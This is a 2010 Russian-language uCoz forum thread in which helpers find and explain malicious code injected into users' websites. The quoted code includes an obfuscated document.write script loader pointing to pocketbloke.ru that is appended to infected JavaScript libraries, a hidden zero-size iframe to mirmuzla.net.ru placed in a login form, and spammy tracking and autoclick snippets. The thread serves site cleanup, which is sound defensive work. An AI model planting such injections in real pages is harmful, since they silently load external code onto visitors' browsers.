Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение)
Вирусы на сайтах (для изучения)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 16 | 02:28:56 22 Авг 2010
Keymaster, вы про этот сайт говорите? http://faits.ru/
на главной вроде чисто.
Quote
Может это Укозовский рекламный банер, там ведь есть ссылки ?
баннер он и так блочить должен.
очистите кеш и куки. возможно он кричит на кеш.
не вижу ничего подозрительно вскрыла все что возможно
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Keymaster
Сообщений: 4
Репутация: 0

Сообщение # 17 | 02:34:40 22 Авг 2010
Quote
Keymaster, На главной :

Дайте пожалуйста подсказку, где это искать ?
В коде ничего подобного нет...
А сайты могут разные появляться, до этого были:
salesyack.ru
fleetgarbage.ru

Добавлено (22-Авг-2010, 02:34:40)
---------------------------------------------
webanet у других пользователей тоже это есть, вон и у Miss_Esq тоже что-то не то... wink
А кеш я чистил wacko

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 18 | 02:41:26 22 Авг 2010
Keymaster, ну только до этого можно докопаться
Code
http://faits.ru/js/slideView.js
это носитель
Code
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/File_System.js"></scri'+'pt>');
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 19 | 03:01:23 22 Авг 2010
//Заменитель checkbox-ов by WinuX. хттп://rsod.ru/
тоже вшит.
в общем, если русскими словами ваши яваскрипт библиотеки заражены. слайдеры и чекбоксы
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 20 | 03:25:36 22 Авг 2010
Keymaster, я же вам дала наводку
вот это
Code
<script src="/js/slideView.js" type="text/javascript"></script>
  <script type="text/javascript">

у вас залит файл /js/slideView.js
его надо скачать, открыть на редактирование и удалить
Code
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/File_System.js"></scri'+'pt>');

и вот кусок

Code
http://faits.ru/js/checkform.js

//Заменитель checkbox-ов by WinuX. http://rsod.ru/

chbox={t:'http://faits.ru/images/chek1.png',f:'http://faits.ru/images/chek.png'} //Картинки для checkbox-ов. t: выбранный, f: невыбранный.
rbox={t:'http://faits.ru/images/chek1.png',f:'http://faits.ru/images/chek.png'} //Картинки для radio. t: выбранный, f: невыбранный.
//Дальше не трогать!
$(document).ready(function(){
$('input[type="checkbox"]').each(function(){this.style.display='none';if(this.checked){$(this).after('<img src="'+chbox.t+'" align="absmiddle">');}else{$(this).after('<img src="'+chbox.f+'" align="absmiddle">');}$(this).bind('click',function(){if(this.checked){$(this).next('img').attr('src',chbox.t)}else{$(this).next('img').attr('src',chbox.f)}});$(this).next('img').bind('click',function(){$(this).prev('input').click();if($(this).prev('input').attr('checked')){this.src=chbox.t;}else{this.src=chbox.f;}});});
$('input[type="radio"]').each(function(){this.style.display='none';if(this.checked){$(this).after('<img src="'+chbox.t+'" align="absmiddle">');}else{$(this).after('<img src="'+chbox.f+'" align="absmiddle">');}var rgroup=this.name;$(this).bind('click',function(){$('input[name="'+rgroup+'"]').each(function(){$(this).next('img').attr('src',rbox.f)});$(this).next('img').attr('src',rbox.t);});$(this).next('img').bind('click',function(){$(this).prev().click();});});});  

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/File_System.js"></scri'+'pt>');
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Keymaster
Сообщений: 4
Репутация: 0

Сообщение # 21 | 03:39:03 22 Авг 2010
webanet спасибо, я все удалил и заново переустановил из исходников.
Вроде все нормально, если не трудно могли бы вы зайти и посмотреть,
появляется ли сообщение о вредоносных ссылках ?
И заранее вам дорогие девушки плюсую, хотя может енто ыщо не конц) wacko biggrin
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 22 | 03:42:46 22 Авг 2010
Keymaster, вот теперь чисто стало. без этого
Code
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/File_System.js"></scri'+'pt>');

очистите кеш, потому что это дело кешируется очень. и больше ваш касперский кричать не будет.
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Melania
Сообщений: 1
Репутация: 2

Сообщение # 23 | 03:42:56 22 Авг 2010
Доброго времени суток! Товарищи, сегодня не могу зайти на свой сайт http://melania.at.ua Идёт переадресация на ya.ru. Что это может быть?
Сообщение отредактировал Melania - Пятница, 27 Авг 2010, 17:01:14
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 24 | 03:42:56 22 Авг 2010
Melania, начните с того, что уберите вот это
Code
<!-- begin lank.ru code -->
<script language="JavaScript">
    var lankru_html = '';
    lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" ';
    lankru_html += 'src="http://lank';
    lankru_html += '.ru/js.php?id=18378';
    lankru_html += '&url=' + encodeURIComponent(document.location);
    lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';
    document.write(lankru_html);
</script>
<!-- end lank.ru code -->
за эту радость вас может яндекс выкинуть из выдачи, и ещё и под фильтр вставить.

далее удалите

Code
<A href="http://freeviral.ru/cgi-bin/r.cgi?r=2858" target="_blank" title="FreeViral.ru - система бесплатной раскрутки и продвижения сайтов">
    <IMG src="http://freeviral.ru/img/ban46860.gif" alt="FreeViral.ru - система бесплатной раскрутки и продвижения сайтов" border="0" width="468" height="60"></A>
вот это счастье и может вас кидать. плюс это система автокликера за который можете получить бан уже от юкоза за накрутку посещений.

будьте внимательны в выборе скриптов и рекламы.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
KOcccTya
Сообщений: 19
Репутация: 3

Сообщение # 25 | 16:20:10 01 Окт 2010
дело в том что я тот комментарий удалил )) был он приблизительно таким

Code
удалено

если оно удалите потом код с комментария .

типо ПОДпись
GunzGaMe
Сообщений: 4
Репутация: 4

Сообщение # 26 | 21:06:01 12 Окт 2010
У меня проблема с вирусами.

Сайт: www.gunitteam.lv

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 27 | 21:59:25 12 Окт 2010
GunzGaMe, форма входа. ифрейм между пароль и запомнить
ифрейм от mirmuzla.net.ru
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 28 | 01:04:18 13 Окт 2010
GunzGaMe, Вот это удалите из HTML шаблона формы входа :

<iframe style="position: absolute; left: 1%; width: 0%; top: 1%; height: 0%;" src="http://mirmuzla.net.ru"></iframe>

geometriya ISO 3166-2 DEE
[-ЛеШкА-]
Сообщений: 1
Репутация: 0

Сообщение # 29 | 12:56:15 13 Окт 2010
Привет всем помогите мне где на ходится у меня вирус на сайте вот сылка сайта http://flatout2.at.ua/ когда входиш на сайт с мозилы выскакивает таблица че за фигня помоги те близ
GunzGaMe
Сообщений: 4
Репутация: 4

Сообщение # 30 | 23:41:10 13 Окт 2010
Я всё удалил,но всё ровно на сайт не пускает.
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение)
Поиск: